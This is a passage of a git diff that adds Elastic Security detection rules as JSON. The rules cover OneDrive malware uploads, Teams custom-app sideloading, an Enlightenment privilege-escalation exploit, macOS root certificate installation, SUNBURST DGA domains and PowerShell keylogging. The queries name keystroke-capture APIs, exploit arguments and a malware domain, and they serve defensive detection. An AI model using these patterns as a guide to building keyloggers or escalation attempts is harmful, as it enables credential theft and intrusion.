"false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "OneDrive Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206.json new file mode 100644 index 00000000000..23de05621cd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "OneDrive Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_104.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_104.json new file mode 100644 index 00000000000..06185193e59 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_104.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 104 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_106.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_106.json new file mode 100644 index 00000000000..a67be068eb3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_106.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_207.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_207.json new file mode 100644 index 00000000000..6073dc1d7aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_207.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 207 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc0fc359-68db-421e-a435-348ced7a7f92_2.json b/packages/security_detection_engine/kibana/security_rule/bc0fc359-68db-421e-a435-348ced7a7f92_2.json new file mode 100644 index 00000000000..0049725f6ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bc0fc359-68db-421e-a435-348ced7a7f92_2.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to exploit a local privilege escalation CVE-2022-37706 via a flaw in Linux window manager package Enlightenment. enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Enlightenment", + "query": "sequence by host.id, process.parent.entity_id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"enlightenment_sys\" and process.args in (\"/bin/mount/\", \"-o\",\"noexec\",\"nosuid\",\"nodev\",\"uid=*\") ]\n [process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and user.id == \"0\"]\n", + "references": [ + "https://ubuntu.com/security/CVE-2022-37706", + "https://www.exploit-db.com/exploits/51180" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bc0fc359-68db-421e-a435-348ced7a7f92", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "bc0fc359-68db-421e-a435-348ced7a7f92_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_106.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_106.json new file mode 100644 index 00000000000..bb1b36cfffa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_106.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to their command and control servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Install Root Certificate", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:security and process.args:\"add-trusted-cert\" and\n not process.parent.executable:(\"/Library/Bitdefender/AVP/product/bin/BDCoreIssues\" or \"/Applications/Bitdefender/SecurityNetworkInstallerApp.app/Contents/MacOS/SecurityNetworkInstallerApp\"\n)\n", + "references": [ + "https://ss64.com/osx/security-cert.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bc1eeacf-2972-434f-b782-3a532b100d67", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "bc1eeacf-2972-434f-b782-3a532b100d67_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_3.json b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_3.json new file mode 100644 index 00000000000..a02aff91063 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_3.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm.", + "from": "now-10m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Machine Learning Detected DGA activity using a known SUNBURST DNS domain", + "query": "ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.registered_domain", + "type": "keyword" + }, + { + "ecs": false, + "name": "ml_is_dga.malicious_prediction", + "type": "unknown" + } + ], + "risk_score": 99, + "rule_id": "bcaa15ce-2d41-44d7-a322-918f9db77766", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. \n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n``` \n", + "severity": "critical", + "tags": [ + "Domain: Network", + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "bcaa15ce-2d41-44d7-a322-918f9db77766_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_112.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_112.json new file mode 100644 index 00000000000..262360794f1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_112.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Keylogging Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Keylogging Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other valuable information as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (\n powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or \"Get-Keystrokes\") or\n powershell.file.script_block_text : (\n (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and\n (GetForegroundWindow or GetWindowTextA or GetWindowTextW or \"WM_KEYBOARD_LL\" or \"WH_MOUSE_LL\")\n )\n ) and not user.id : \"S-1-5-18\"\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n )\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Keystrokes.ps1", + "https://github.com/MojtabaTajik/FunnyKeylogger/blob/master/FunnyLogger.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1056", + "name": "Input Capture", + "reference": "https://attack.mitre.org/techniques/T1056/", + "subtechnique": [ + { + "id": "T1056.001", + "name": "Keylogging", + "reference": 